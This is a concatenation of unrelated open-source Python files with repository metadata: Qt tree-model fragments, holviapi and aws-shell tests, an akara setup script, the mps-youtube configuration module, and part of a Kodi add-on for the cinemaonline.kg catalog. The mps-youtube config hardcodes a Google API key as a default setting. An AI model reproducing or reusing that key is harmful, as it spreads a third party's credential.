# self.insertRow(['4', '5', '6'])
#
# index = model.index(0, 0)
# print model.data(index, QtCore.Qt.DisplayRole)
# self.insertChild(['5', '15', '25'], index)
#
# def insertChild(self, data, index = None):
# if index == None:
# index = self.tree.selectionModel().currentIndex()
# model = self.tree.model()
#
# if not model.insertRow(0, index):
# return
#
# for column in range(model.columnCount(index)):
# child = model.index(0, column, index)
# model.setData(child, data[column], QtCore.Qt.EditRole)
#
# def insertRow(self, data, index = None):
# if index == None:
# index = self.tree.selectionModel().currentIndex()
# model = self.tree.model()
#
# if not model.insertRow(index.row()+1, index.parent()):
# return
#
# for column in range(model.columnCount(index.parent())):
# child = model.index(index.row()+1, column, index.parent())
# model.setData(child, data[column], QtCore.Qt.EditRole)
#
#if __name__ == "__main__":
# import sys
# app = QtGui.QApplication(sys.argv)
# gui = MainWindow()
# gui.show()
# sys.exit(app.exec_())
| Snegovikufa/HPGL-GUI | gui_widgets/treemodel.py | Python | gpl-2.0 | 12,137 | 0.004696 |
# -*- coding: utf-8 -*-
import random
import pytest
from holviapi.utils import (
ISO_REFERENCE_VALID,
fin_reference_isvalid,
int2fin_reference,
iso_reference_isvalid,
str2iso_reference
)
def test_fin_reference_isvalid_valid_results():
    """Test handpicked, known-good inputs"""
    for reference in (13, 107, 105523, 102319, 108326, 100816, 108724,
                      108711):
        assert fin_reference_isvalid(reference)
def test_fin_reference_isvalid_invalid_results():
    """Test handpicked, known-bad inputs"""
    for reference in (1071110, 1055110, 1026110, 1039110, 1084110):
        assert not fin_reference_isvalid(reference)
def test_int2fin_reference_valid_results():
    """Test handpicked, known-good inputs and corresponding outputs"""
    cases = [(1, '13'), (10, '107'), (10552, '105523'), (10231, '102319'),
             (10832, '108326'), (10081, '100816'), (10872, '108724'),
             (10871, '108711')]
    for number, expected in cases:
        assert int2fin_reference(number) == expected
def test_int2fin_reference_invalid_results():
    """Test some invalid values from issue #6"""
    cases = [(10711, '1071110'), (10551, '1055110'), (10261, '1026110'),
             (10391, '1039110'), (10841, '1084110')]
    for number, wrong in cases:
        assert int2fin_reference(number) != wrong
def test_int2fin_reference_random_inputs():
    """Fuzz: every generated reference must pass the validity check."""
    for _ in range(1000):
        number = random.randint(1, 2**24)
        assert fin_reference_isvalid(int2fin_reference(number))
def test_str2iso_reference_valid_results():
    """Known-good input/output pair for str2iso_reference."""
    assert str2iso_reference('C2H5OH') == 'RF97C2H5OH'
def test_str2iso_reference_invalid_results():
    """A wrong check digit pair (40) must not be produced."""
    assert str2iso_reference('C2H5OH') != 'RF40C2H5OH'
def test_iso_reference_isvalid_valid_results():
    """A correctly check-digited RF reference validates."""
    assert iso_reference_isvalid('RF97C2H5OH')
def test_iso_reference_isvalid_invalid_results():
    """An RF reference with wrong check digits is rejected."""
    assert not iso_reference_isvalid('RF40C2H5OH')
def test_str2iso_reference_random_integers():
    """Fuzz: ISO references built from random integers must validate."""
    for _ in range(1000):
        number = random.randint(1, 2**24)
        assert iso_reference_isvalid(str2iso_reference(str(number)))
def test_str2iso_reference_random_strings():
    """Fuzz: ISO references built from random valid characters must validate."""
    for _ in range(1000):
        payload = ''.join(random.choice(ISO_REFERENCE_VALID)
                          for _ in range(5, 14))
        assert iso_reference_isvalid(str2iso_reference(payload))
| rambo/python-holviapi | holviapi/tests/test_refnos.py | Python | mit | 2,888 | 0 |
#!/usr/bin/env python3.4
# -*- coding: utf-8 -*-
| welblade/pyrom | test/__init__.py | Python | mit | 49 | 0 |
import pytest
from awsshell.fuzzy import fuzzy_search
@pytest.mark.parametrize("search,corpus,expected", [
    ('foo', ['foobar', 'foobaz'], ['foobar', 'foobaz']),
    ('f', ['foo', 'foobar', 'bar'], ['foo', 'foobar']),
    ('fbb', ['foo-bar-baz', 'fo-ba-baz', 'bar'], ['foo-bar-baz', 'fo-ba-baz']),
    ('fff', ['fi-fi-fi', 'fo'], ['fi-fi-fi']),
    # The more chars it matches, the higher the score.
    ('pre', ['prefix', 'pre', 'not'], ['pre', 'prefix']),
    ('nomatch', ['noma', 'nomatccc'], []),
])
def test_subsequences(search, corpus, expected):
    """fuzzy_search must match subsequences, rank better matches first,
    and return an empty list when nothing matches."""
    actual = fuzzy_search(search, corpus)
    assert actual == expected
| awslabs/aws-shell | tests/unit/test_fuzzy.py | Python | apache-2.0 | 629 | 0 |
from akara.dist import setup

# Minimal setup script used by the test-suite: a distribution named
# "basic" registering a single Akara extension module, blah.py.
setup(name="basic",
      version="1.0",
      akara_extensions=["blah.py"]
     )
| uogbuji/akara | test/setup_scripts/setup_basic.py | Python | apache-2.0 | 108 | 0.009259 |
import os
import re
import sys
import copy
import pickle
from urllib.request import urlopen
from urllib.error import HTTPError
from urllib.parse import urlencode
try:
import pylast
has_pylast = True
except ImportError:
has_pylast = False
import pafy
from . import g, c, paths, util
# True when running under Windows (affects player-executable lookup).
mswin = os.name == "nt"
class ConfigItem:

    """ A configuration item.

    Wraps one named setting: its default, current value, expected type
    (derived from the default), optional numeric bounds, an optional
    allowed-value list and an optional validation callback.
    """

    def __init__(self, name, value, minval=None, maxval=None, check_fn=None,
                 require_known_player=False, allowed_values=None):
        """ If specified, the check_fn should return a dict.

        {valid: bool, message: success/fail message, value: value to set}
        """
        # Keep the initial value both as current value and as the default,
        # and derive the expected type from it.
        self.default = self.value = value
        self.name = name
        self.type = type(value)
        self.maxval, self.minval = maxval, minval
        self.check_fn = check_fn
        self.require_known_player = require_known_player
        self.allowed_values = []

        if allowed_values:
            self.allowed_values = allowed_values

    @property
    def get(self):
        """ Return value. """
        return self.value

    @property
    def display(self):
        """ Return value in a format suitable for display. """
        retval = self.value

        if self.name == "max_res":
            retval = str(retval) + "p"

        if self.name == "encoder":
            retval = str(retval) + " [%s]" % (str(g.encoders[retval]['name']))

        return retval

    def set(self, value):
        """ Set value with checks.

        Returns a user-facing success or failure message; the value is
        only stored (and Config saved) when all checks pass.
        """
        # note: fail_msg should contain %s %s for self.name, value
        #       success_msg should not
        # pylint: disable=R0912
        # too many branches
        success_msg = fail_msg = ""
        value = value.strip()
        value_orig = value

        # handle known player not set
        if self.allowed_values and value not in self.allowed_values:
            fail_msg = "%s must be one of * - not %s"
            allowed_values = copy.copy(self.allowed_values)
            if '' in allowed_values:
                allowed_values[allowed_values.index('')] = "<nothing>"
            fail_msg = fail_msg.replace("*", ", ".join(allowed_values))

        if self.require_known_player and \
                not util.is_known_player(Config.PLAYER.get):
            fail_msg = "%s requires mpv or mplayer, can't set to %s"

        # handle true / false values
        elif self.type == bool:

            if value.upper() in "0 OFF NO DISABLED FALSE".split():
                value = False
                success_msg = "%s set to False" % c.c("g", self.name)

            elif value.upper() in "1 ON YES ENABLED TRUE".split():
                value = True
                success_msg = "%s set to True" % c.c("g", self.name)

            else:
                fail_msg = "%s requires True/False, got %s"

        # handle int values
        elif self.type == int:

            # NOTE(review): isdigit() rejects signs, so negative values can
            # never be set here -- confirm that is intended.
            if not value.isdigit():
                fail_msg = "%s requires a number, got %s"

            else:
                value = int(value)

                if self.maxval and self.minval:

                    if not self.minval <= value <= self.maxval:
                        m = " must be between %s and %s, got "
                        m = m % (self.minval, self.maxval)
                        fail_msg = "%s" + m + "%s"

                if not fail_msg:
                    dispval = value or "None"
                    success_msg = "%s set to %s" % (c.c("g", self.name),
                                                    dispval)

        # handle space separated list
        elif self.type == list:
            success_msg = "%s set to %s" % (c.c("g", self.name), value)
            value = value.split()

        # handle string values
        elif self.type == str:
            dispval = value or "None"
            success_msg = "%s set to %s" % (c.c("g", self.name),
                                            c.c("g", dispval))

        # handle failure
        if fail_msg:
            failed_val = value_orig.strip() or "<nothing>"
            colvals = c.y + self.name + c.w, c.y + failed_val + c.w
            return fail_msg % colvals

        elif self.check_fn:
            # Delegate final validation (and possible value rewriting) to
            # the item-specific callback.
            checked = self.check_fn(value)
            value = checked.get("value") or value

            if checked['valid']:
                value = checked.get("value", value)
                self.value = value
                Config.save()
                return checked.get("message", success_msg)

            else:
                return checked.get('message', fail_msg)

        elif success_msg:
            self.value = value
            Config.save()
            return success_msg
def check_console_width(val):
    """ Show ruler to check console width. """
    ruler = "-" * val
    note = "console_width set to %s, try a lower value if above line overlaps" % val
    return dict(valid=True, message=ruler + "\n" + note)
def check_api_key(key):
    """ Validate an API key by calling an API endpoint with no quota cost.

    On success, pafy is switched to the same key.  Only HTTPError is
    treated as an invalid key; other network failures propagate.
    """
    url = "https://www.googleapis.com/youtube/v3/i18nLanguages"
    query = {"part": "snippet", "fields": "items/id", "key": key}
    try:
        # NOTE(review): the response object is never closed; harmless for a
        # one-off check but worth a with-block if revisited.
        urlopen(url + "?" + urlencode(query)).read()
        message = "The key, '" + key + "' will now be used for API requests."
        # Make pafy use the same api key
        pafy.set_api_key(Config.API_KEY.get)
        return dict(valid=True, message=message)
    except HTTPError:
        message = "Invalid key or quota exceeded, '" + key + "'"
        return dict(valid=False, message=message)
def check_ddir(d):
    """ Check whether dir is a valid directory. """
    expanded = os.path.expanduser(d)
    if not os.path.isdir(expanded):
        # Path missing or not a directory: reject without a value.
        return dict(valid=False,
                    message="Not a valid directory: " + c.r + d + c.w)
    return dict(valid=True,
                message="Downloads will be saved to " + c.y + d + c.w,
                value=expanded)
def check_win_pos(pos):
    """ Check window position input.

    Accepts strings like "top-left" or "bottom right" (case-insensitive);
    an empty string means the default (unset) position.
    """
    if not pos.strip():
        return dict(valid=True, message="Window position not set (default)")

    reg = r"(TOP|BOTTOM).?(LEFT|RIGHT)"
    match = re.match(reg, pos.lower(), re.I)

    if not match:
        msg = "Try something like top-left or bottom-right (or default)"
        return dict(valid=False, message=msg)

    normalised = "%s-%s" % match.groups()
    msg = "Window position set to %s" % normalised
    return dict(valid=True, message=msg, value=normalised)
def check_win_size(size):
    """ Check window size input.

    Accepts blank (use default) or WIDTHxHEIGHT with 1-4 digits each.
    """
    if not size.strip():
        return dict(valid=True, message="Window size not set (default)")

    size = size.lower()

    if re.match(r"\d{1,4}x\d{1,4}", size, re.I):
        return dict(valid=True, value=size)

    return dict(valid=False, message="Try something like 720x480")
def check_encoder(option):
    """ Check encoder value is acceptable.

    The option is an index into the global encoder list; anything past the
    end of that list is rejected.
    """
    encoders = g.encoders

    if option < len(encoders):
        message = "Encoder set to %s%s%s" % (c.y, encoders[option]['name'], c.w)
        return dict(valid=True, message=message)

    message = ("%s%s%s is too high, type %sencoders%s to see valid values"
               % (c.y, option, c.w, c.g, c.w))
    return dict(valid=False, message=message)
def check_player(player):
    """ Check player exefile exists and get mpv version.

    Returns a dict with 'valid', 'message' and (when valid) 'value' keys.
    On Windows, when the bare name is not found, retries with a ".com" and
    then ".exe" suffix (mpv.com is preferred; mpv.exe has known issues).

    Fix: removed a stray debug ``print(player)`` that wrote to stdout on
    every successful check.
    """
    if util.has_exefile(player):
        util.assign_player(player)

        if "mpv" in player:
            version = "%s.%s.%s" % g.mpv_version
            fmt = c.g, c.w, c.g, c.w, version
            msg = "%splayer%s set to %smpv%s (version %s)" % fmt
            return dict(valid=True, message=msg, value=player)

        msg = "%splayer%s set to %s%s%s" % (c.g, c.w, c.g, player, c.w)
        return dict(valid=True, message=msg, value=player)

    if mswin and not (player.endswith(".exe") or player.endswith(".com")):
        # Using mpv.exe has issues; use mpv.com
        if "mpv" in player:
            retval = check_player(player + ".com")

            if retval["valid"]:
                return retval

        return check_player(player + ".exe")

    msg = "Player application %s%s%s not found" % (c.r, player, c.w)
    return dict(valid=False, message=msg)
def check_lastfm_password(password):
    """ Hash the last.fm password, or reject it when pylast is missing. """
    if has_pylast:
        return dict(valid=True, value=pylast.md5(password))

    return dict(valid=False, message="pylast not installed")
class _Config:
    """ Holds various configuration values.

    Settings are looked up by upper-cased name, either by subscription
    (``Config["ORDER"]``) or attribute access (``Config.ORDER``), and are
    persisted as a plain dict pickled to ``g.CFFILE``.
    """
    # One ConfigItem per user-visible setting.  The item's name,
    # upper-cased, is the key used by __getitem__/__getattr__/__iter__.
    _configitems = [
        ConfigItem("order", "relevance",
                   allowed_values="relevance date views rating title".split()),
        ConfigItem("user_order", "", allowed_values =
                   [""] + "relevance date views rating".split()),
        ConfigItem("max_results", 19, maxval=50, minval=1),
        ConfigItem("console_width", 80, minval=70,
                   maxval=880, check_fn=check_console_width),
        ConfigItem("max_res", 2160, minval=192, maxval=2160),
        ConfigItem("player", "mplayer" + ".exe" * mswin,
                   check_fn=check_player),
        ConfigItem("playerargs", ""),
        ConfigItem("encoder", 0, minval=0, check_fn=check_encoder),
        ConfigItem("notifier", ""),
        ConfigItem("checkupdate", True),
        ConfigItem("show_player_keys", True, require_known_player=True),
        ConfigItem("fullscreen", False, require_known_player=True),
        ConfigItem("show_status", True),
        ConfigItem("columns", ""),
        ConfigItem("ddir", paths.get_default_ddir(), check_fn=check_ddir),
        ConfigItem("overwrite", True),
        ConfigItem("show_video", False),
        ConfigItem("search_music", True),
        ConfigItem("window_pos", "", check_fn=check_win_pos,
                   require_known_player=True),
        ConfigItem("window_size", "",
                   check_fn=check_win_size, require_known_player=True),
        ConfigItem("download_command", ''),
        ConfigItem("lastfm_username", ''),
        ConfigItem("lastfm_password", '', check_fn=check_lastfm_password),
        ConfigItem("lastfm_api_key", ''),
        ConfigItem("lastfm_api_secret", ''),
        ConfigItem("audio_format", "auto",
                   allowed_values="auto webm m4a".split()),
        ConfigItem("video_format", "auto",
                   allowed_values="auto webm mp4 3gp".split()),
        ConfigItem("api_key", "AIzaSyCIM4EzNqi1in22f4Z3Ru3iYvLaY8tc3bo",
                   check_fn=check_api_key),
        ConfigItem("autoplay", False),
        ConfigItem("set_title", True),
        ConfigItem("mpris", not mswin),
    ]

    def __getitem__(self, key):
        """ Return the ConfigItem whose upper-cased name matches *key*. """
        # TODO: Possibly more efficient algorithm, w/ caching
        for i in self._configitems:
            if i.name.upper() == key:
                return i
        raise KeyError

    def __getattr__(self, name):
        """ Make ``Config.NAME`` an alias for ``Config["NAME"]``. """
        # Only called for attributes not found normally, so real attributes
        # and methods of this class are unaffected.
        try:
            return self[name]
        except KeyError:
            raise AttributeError

    def __iter__(self):
        """ Iterate over the upper-cased names of all config items. """
        return (i.name.upper() for i in self._configitems)

    def save(self):
        """ Save current config to file. """
        # Persist plain values only (protocol 2 keeps files Py2-readable).
        config = {setting: self[setting].value for setting in self}
        with open(g.CFFILE, "wb") as cf:
            pickle.dump(config, cf, protocol=2)
        util.dbg(c.p + "Saved config: " + g.CFFILE + c.w)

    def load(self):
        """ Override config if config file exists. """
        if os.path.exists(g.CFFILE):
            with open(g.CFFILE, "rb") as cf:
                saved_config = pickle.load(cf)
            for k, v in saved_config.items():
                try:
                    self[k].value = v
                except KeyError:  # Ignore unrecognised data in config
                    util.dbg("Unrecognised config item: %s", k)

            # Update config files from versions <= 0.01.41
            # (PLAYERARGS used to be stored as a list; migrate to a string
            # and strip arguments the player now handles itself.)
            if isinstance(self.PLAYERARGS.get, list):
                self.WINDOW_POS.value = "top-right"
                redundant = ("-really-quiet --really-quiet -prefer-ipv4 -nolirc "
                             "-fs --fs".split())
                for r in redundant:
                    util.dbg("removing redundant arg %s", r)
                    util.list_update(r, self.PLAYERARGS.value, remove=True)
                self.PLAYERARGS.value = " ".join(self.PLAYERARGS.get)
                self.save()
# Create the singleton and make ``import config`` yield it directly.
Config = _Config()
del _Config  # _Config is a singleton and should not have more instances
# Prevent module from being deleted
# http://stackoverflow.com/questions/5365562/why-is-the-value-of-name-changing-after-assignment-to-sys-modules-name
# Holding a reference to the original module object keeps it (and its
# globals) alive after it is replaced in sys.modules below.
ref = sys.modules[__name__]
# Any module trying to import config will get the Config object instead
sys.modules[__name__] = Config
| np1/mps-youtube | mps_youtube/config.py | Python | gpl-3.0 | 13,150 | 0.001217 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2, re, json, time, xbmc, traceback
from _header import *
# Remote site endpoints / identity for this provider module.
BASE_URL = 'http://cinemaonline.kg/'
BASE_NAME = 'Cinema Online'
BASE_LABEL = 'oc'  # short label used in plugin routes and icon names
GA_CODE = 'UA-34889597-1'  # analytics ids passed to kg_stats() on each fetch
NK_CODE = '1744'
def default_oc_noty():
    """ Show the standard "server unavailable" notification for this site. """
    icon = get_local_icon('noty_' + BASE_LABEL)
    plugin.notify('Сервер недоступен', BASE_NAME, image=icon)
def get_oc_cookie():
    """ Return the site's session cookies, using a cached copy when available.

    Values are kept in plugin storage under BASE_LABEL with TTL=1440
    (presumably minutes, i.e. one day -- confirm against the storage API).
    On a cache miss the site and its tracking image are fetched to collect
    fresh Set-Cookie headers.  Returns a dict with keys 'phpsessid',
    'utmp' and 'set' (empty strings when the site is unreachable).
    """
    result = {'phpsessid': '', 'utmp': '', 'set': ''}
    cookie = plugin.get_storage(BASE_LABEL, TTL=1440)
    try:
        # Cache hit: all three values already stored.
        result['phpsessid'] = cookie['phpsessid']
        result['utmp'] = cookie['utmp']
        result['set'] = cookie['set']
    except:
        try:
            # Cache miss: fetch the front page and the beacon image to
            # gather Set-Cookie headers, then parse individual values.
            a = common.fetchPage({'link': BASE_URL})
            b = common.fetchPage({'link': BASE_URL + 'cinema.png?' + str(int(time.time()))})
            cookie['set'] = a['header']['Set-Cookie'] + '; ' + b['header']['Set-Cookie']
            result['set'] = cookie['set']
            cookies = common.getCookieInfoAsHTML()
            cookie['phpsessid'] = common.parseDOM(cookies, 'cookie', attrs={'name': 'PHPSESSID'}, ret='value')[0]
            try:
                # The tracking cookie has been observed under two names.
                cookie['utmp'] = common.parseDOM(cookies, 'cookie', attrs={'name': '_utmp'}, ret='value')[0]
            except:
                cookie['utmp'] = common.parseDOM(cookies, 'cookie', attrs={'name': '__utmp'}, ret='value')[0]
            result['phpsessid'] = cookie['phpsessid']
            result['utmp'] = cookie['utmp']
        except:
            # Site unreachable: fall through with (partially) empty result.
            pass
    return result
# Cookie handling is currently disabled; kept for possible re-enabling.
COOKIE = ''  # get_oc_cookie()
# JSON API endpoint; session/JsHttpRequest parameters are not used while
# cookie handling is disabled.
BASE_API_URL = BASE_URL + 'api.php?format=json'  # &' + COOKIE['phpsessid'] + '&JsHttpRequest='+str(int(time.time()))+'-xml'
@plugin.route('/site/' + BASE_LABEL)
def oc_index():
    """ Root menu for the Cinema Online section. """
    entries = []

    entries.append({
        'label': set_color('[ Поиск ]', 'dialog', True),
        'path': plugin.url_for('oc_search'),
        'icon': get_local_icon('find')
    })
    entries.append({
        'label': set_color('Новинки на CinemaOnline', 'light'),
        'path': plugin.url_for('oc_category', id=0)
    })
    entries.append({
        'label': set_color('По жанрам', 'bold'),
        'path': plugin.url_for('oc_genres')
    })
    entries.append({
        'label': 'Бестселлеры',
        'path': plugin.url_for('oc_bestsellers')
    })
    entries.append({
        'label': 'Лучшие по версии IMDB',
        'path': plugin.url_for('oc_category', id=2)
    })
    entries.append({
        'label': 'Лучшие по версии КиноПоиск',
        'path': plugin.url_for('oc_category', id=9)
    })

    return entries
@plugin.route('/site/' + BASE_LABEL + '/genre')
def oc_genres():
    """ List all genres as menu entries. """
    entries = []

    for genre in get_genres():
        entries.append({
            'label': genre['label'],
            'path': plugin.url_for('oc_genre', id=genre['id'])
        })

    return entries
@plugin.route('/site/' + BASE_LABEL + '/bestsellers')
def oc_bestsellers():
    """ List the site's bestseller movies. """
    entries = []

    for movie in get_bestsellers():
        entries.append({
            'label': movie['label'],
            'path': plugin.url_for('oc_movie', id=movie['id']),
            'icon': movie['icon'],
        })

    return entries
@plugin.route('/site/' + BASE_LABEL + '/genre/<id>')
def oc_genre(id):
    """ First page of movies for one genre. """
    data = get_genre_movie_list(id)
    entries = []

    for movie in data['items']:
        entries.append({
            'label': movie['label'],
            'path': plugin.url_for('oc_movie', id=movie['id']),
            'properties': movie['properties'],
            'icon': movie['icon'],
        })

    if data['sys_items']:
        entries = add_pagination(entries, data['sys_items'],
                                 'oc_genre_pagination', id)

    return entries
@plugin.route('/site/' + BASE_LABEL + '/genre/<id>/<page>')
def oc_genre_pagination(id, page='1'):
    """ A specific page of movies for one genre. """
    data = get_genre_movie_list(id, int(page))
    entries = []

    for movie in data['items']:
        entries.append({
            'label': movie['label'],
            'path': plugin.url_for('oc_movie', id=movie['id']),
            'properties': movie['properties'],
            'icon': movie['icon'],
        })

    if data['sys_items']:
        entries = add_pagination(entries, data['sys_items'],
                                 'oc_genre_pagination', id)

    return plugin.finish(entries, update_listing=True)
@plugin.route('/site/' + BASE_LABEL + '/category/<id>')
def oc_category(id):
    """ First page of a catalog ordering (new / top IMDB / top KinoPoisk). """
    data = get_movie_list(id)
    entries = []

    for movie in data['items']:
        entries.append({
            'label': movie['label'],
            'path': plugin.url_for('oc_movie', id=movie['id']),
            'properties': movie['properties'],
            'icon': movie['icon'],
        })

    if data['sys_items']:
        entries = add_pagination(entries, data['sys_items'],
                                 'oc_category_pagination', id)

    return entries
@plugin.route('/site/' + BASE_LABEL + '/category/<id>/<page>')
def oc_category_pagination(id, page='1'):
    """ A specific page of a catalog ordering. """
    data = get_movie_list(id, int(page))
    entries = []

    for movie in data['items']:
        entries.append({
            'label': movie['label'],
            'path': plugin.url_for('oc_movie', id=movie['id']),
            'properties': movie['properties'],
            'icon': movie['icon'],
        })

    if data['sys_items']:
        entries = add_pagination(entries, data['sys_items'],
                                 'oc_category_pagination', id)

    return plugin.finish(entries, update_listing=True)
@plugin.route('/site/' + BASE_LABEL + '/to_page/category/<id>/<page>')
def oc_go_to_page(id, page=1):
    """ Prompt for a page number and jump to that page of a category.

    Cancelling the prompt redirects back to page *page* - 1 of the
    category listing.
    """
    search_page = common.getUserInputNumbers('Укажите страницу')
    if (search_page):
        # User input is 1-based; internal pages are 0-based.
        # NOTE(review): the fallback for input <= 0 is page 1, not page 0 --
        # looks unintended, confirm before changing.
        search_page = int(search_page) - 1 if (int(search_page) > 0) else 1
        item_list = get_movie_list(id, search_page)
        items = [{
            'label': item['label'],
            'path': plugin.url_for('oc_movie', id=item['id']),
            'properties': item['properties'],
            'icon': item['icon'],
        } for item in item_list['items']]
        if (item_list['sys_items']):
            # Prepend pagination controls; the "go to page" entry routes
            # back here, the others route to the normal pagination view.
            for item in item_list['sys_items']:
                items.insert(0, {
                    'label': item['label'],
                    'path': plugin.url_for('oc_go_to_page', id=id, page=item['page']) if (
                        item['search'] == True ) else plugin.url_for('oc_category_pagination', id=id,
                                                                     page=item['page']),
                    'icon': item['icon']
                })
        return plugin.finish(items, update_listing=True)
    else:
        plugin.redirect('plugin://' + plugin.id + '/site/' + BASE_LABEL + '/category/' + id + '/' + str(int(page) - 1))
@plugin.route('/site/' + BASE_LABEL + '/movie/<id>')
def oc_movie(id):
    """ Show one movie: its trailer, playable files and related titles.

    When the movie resolves to more than one entry, the entries are queued
    as a playlist and the playlist window is opened instead of returning a
    directory listing.
    """
    item_list = get_movie(id)
    # xbmc.log('Item list: ' + str(item_list))
    items = [{
        # 'title' : item['label'],
        'label': item['label'],
        'path': item['url'],
        'thumbnail': item['icon'],
        'properties': item['properties'],
        'is_playable': True
    } for item in item_list['items']]
    if (item_list['playlist']):
        # Multiple entries: queue them and open the playlist window.
        # xbmc.log('Item list play: ' + str(item_list['items']))
        kgontv_playlist(item_list['items'])
        xbmc.executebuiltin('ActivateWindow(VideoPlaylist)')
    else:
        # xbmc.log('Item play: ' + str(items))
        return items
@plugin.route('/site/' + BASE_LABEL + '/search')
def oc_search():
    """ Prompt for a query and list matching movies. """
    query = plugin.keyboard('', 'Что ищете?')

    if not query:
        # Cancelled: go back to the section root.
        plugin.redirect('plugin://' + plugin.id + '/site/' + BASE_LABEL)
        return

    entries = []
    for movie in get_search_results(str(query)):
        entries.append({
            'label': movie['label'],
            'path': plugin.url_for('oc_movie', id=movie['id']),
            'icon': movie['icon'],
        })

    return entries
# method
def get_bestsellers():
    """ Fetch the bestseller listing, flattened into label/icon/id dicts.

    Each movie label gets its section name appended in brackets.  On any
    failure the default "server unavailable" notification is shown and an
    empty list is returned.
    """
    entries = []
    try:
        result = common.fetchPage({'link': BASE_API_URL,
                                   'post_data': {'action[0]': 'Video.getBestsellers'}})
        kg_stats(BASE_URL, GA_CODE, NK_CODE)

        if result['status'] == 200:
            data = json.loads(result['content'])

            for section in data['json'][0]['response']['bestsellers']:
                for movie in section['movies']:
                    entries.append({
                        'label': movie['name'] + ' [' + section['name'] + ']',
                        'icon': BASE_URL + movie['cover'],
                        'id': movie['movie_id']
                    })
    except:
        default_oc_noty()

    return entries
# method
def get_genres():
    """ Fetch the genre list as label/id dicts.

    On any failure the default notification is shown and an empty list is
    returned.
    """
    entries = []
    try:
        result = common.fetchPage({'link': BASE_API_URL,
                                   'post_data': {'action[0]': 'Video.getGenres'}})
        kg_stats(BASE_URL, GA_CODE, NK_CODE)

        if result['status'] == 200:
            data = json.loads(result['content'])

            for genre in data['json'][0]['response']['genres']:
                entries.append({
                    'label': genre['name'],
                    'id': genre['id']
                })
    except:
        default_oc_noty()

    return entries
# method
def get_movie_list(order_id, page='0'):
    """ Fetch one page (40 entries) of the catalog sorted by *order_id*.

    Returns {'items': [...], 'sys_items': [...]} where sys_items holds
    pagination entries.  Entries carrying the 'Megogo' genre are skipped;
    malformed entries are silently ignored.
    """
    sys_items = []
    items = []
    size = 40
    try:
        # *page* may arrive as str from a route; 0-based page -> offset.
        offset = int(page) * size
        result = common.fetchPage({'link': BASE_API_URL,
                                   'post_data': {'action[0]': 'Video.getCatalog', 'offset[0]': str(offset),
                                                 'size[0]': str(size), 'order[0]': order_id}})
        kg_stats(BASE_URL, GA_CODE, NK_CODE)
        if result['status'] == 200:
            data = json.loads(result['content'])
            data = data['json'][0]['response']
            # ======== pagination ========#
            # Integer division (Python 2) yields the 1-based page number.
            sys_items = KG_get_pagination((offset / size + 1), total=data['total'], size=size, offset=1)
            # ======== END pagination ========#
            megogo = False
            for item in data['movies']:
                try:
                    try:
                        # Show at most the first three genres.
                        genres = ' [' + ', '.join(item['genres'][:3]) + ']'
                    except:
                        genres = ''
                    if 'Megogo' not in item['genres']:
                        # Ratings default to '0'; the combined rating text is
                        # only built when BOTH sources report a value.
                        imdb = {'rating': '0', 'votes': '0'}
                        kinopoisk = {'rating': '0', 'votes': '0'}
                        if ('rating_imdb_value' in item):
                            imdb = {'rating': item['rating_imdb_value'], 'votes': item['rating_imdb_count']}
                        if ('rating_kinopoisk_value' in item):
                            kinopoisk = {'rating': item['rating_kinopoisk_value'],
                                         'votes': item['rating_kinopoisk_count']}
                        rating = ''
                        if (imdb['rating'] != '0' and kinopoisk['rating'] != '0'):
                            rating = ' ' + imdb['rating'] + ' (' + imdb['votes'] + ') / ' + kinopoisk[
                                'rating'] + ' (' + kinopoisk['votes'] + ')'
                        country = ''
                        if ('countries' in item):
                            country = item['countries'][0]
                        properties = {
                            'Country': country,
                            'PlotOutline': item['description'],
                            'Plot': item['long_description'],
                            'Year': item['year'],
                            'Rating': imdb['rating'],
                            'Votes': imdb['votes']
                        }
                        country = ' (' + country + ')' if (country) else ''
                        label = common.replaceHTMLCodes('[B]' + item['name'] + '[/B]' + country + genres + rating)
                        icon = BASE_URL + item['cover']
                        video_id = item['movie_id']
                        items.append({
                            'label': label,
                            'icon': icon,
                            'properties': properties,
                            'id': video_id
                        })
                    else:
                        megogo = True
                except:
                    # Malformed entry: skip it.
                    pass
            # if megogo: plugin.notify('Megogo пропущен', BASE_NAME, 1000, get_local_icon('noty_' + BASE_LABEL))
    except:
        default_oc_noty()
    return {'items': items, 'sys_items': sys_items}
# method
def get_genre_movie_list(genre, page='0'):
    """ Fetch one page (40 entries) of the catalog filtered by *genre*.

    Same shape and behaviour as get_movie_list() (of which this is a
    near-duplicate with a genre filter and fixed relevance ordering):
    returns {'items': [...], 'sys_items': [...]}, skips 'Megogo' entries,
    silently ignores malformed ones.
    """
    sys_items = []
    items = []
    size = 40
    order_id = 0  # fixed ordering when browsing by genre
    try:
        offset = int(page) * size
        result = common.fetchPage({'link': BASE_API_URL,
                                   'post_data': {'action[0]': 'Video.getCatalog', 'offset[0]': str(offset),
                                                 'size[0]': str(size), 'order[0]': order_id, 'genre[0]': genre}})
        kg_stats(BASE_URL, GA_CODE, NK_CODE)
        if result['status'] == 200:
            data = json.loads(result['content'])
            data = data['json'][0]['response']
            # ======== pagination ========#
            # Integer division (Python 2) yields the 1-based page number.
            sys_items = KG_get_pagination((offset / size + 1), total=data['total'], size=size, offset=1)
            # ======== END pagination ========#
            megogo = False
            for item in data['movies']:
                try:
                    try:
                        # Show at most the first three genres.
                        genres = ' [' + ', '.join(item['genres'][:3]) + ']'
                    except:
                        genres = ''
                    if 'Megogo' not in item['genres']:
                        # Ratings default to '0'; the combined rating text is
                        # only built when BOTH sources report a value.
                        imdb = {'rating': '0', 'votes': '0'}
                        kinopoisk = {'rating': '0', 'votes': '0'}
                        if ('rating_imdb_value' in item):
                            imdb = {'rating': item['rating_imdb_value'], 'votes': item['rating_imdb_count']}
                        if ('rating_kinopoisk_value' in item):
                            kinopoisk = {'rating': item['rating_kinopoisk_value'],
                                         'votes': item['rating_kinopoisk_count']}
                        rating = ''
                        if (imdb['rating'] != '0' and kinopoisk['rating'] != '0'):
                            rating = ' ' + imdb['rating'] + ' (' + imdb['votes'] + ') / ' + kinopoisk[
                                'rating'] + ' (' + kinopoisk['votes'] + ')'
                        country = ''
                        if ('countries' in item):
                            country = item['countries'][0]
                        properties = {
                            'Country': country,
                            'PlotOutline': item['description'],
                            'Plot': item['long_description'],
                            'Year': item['year'],
                            'Rating': imdb['rating'],
                            'Votes': imdb['votes']
                        }
                        country = ' (' + country + ')' if (country) else ''
                        label = common.replaceHTMLCodes('[B]' + item['name'] + '[/B]' + country + genres + rating)
                        icon = BASE_URL + item['cover']
                        video_id = item['movie_id']
                        items.append({
                            'label': label,
                            'icon': icon,
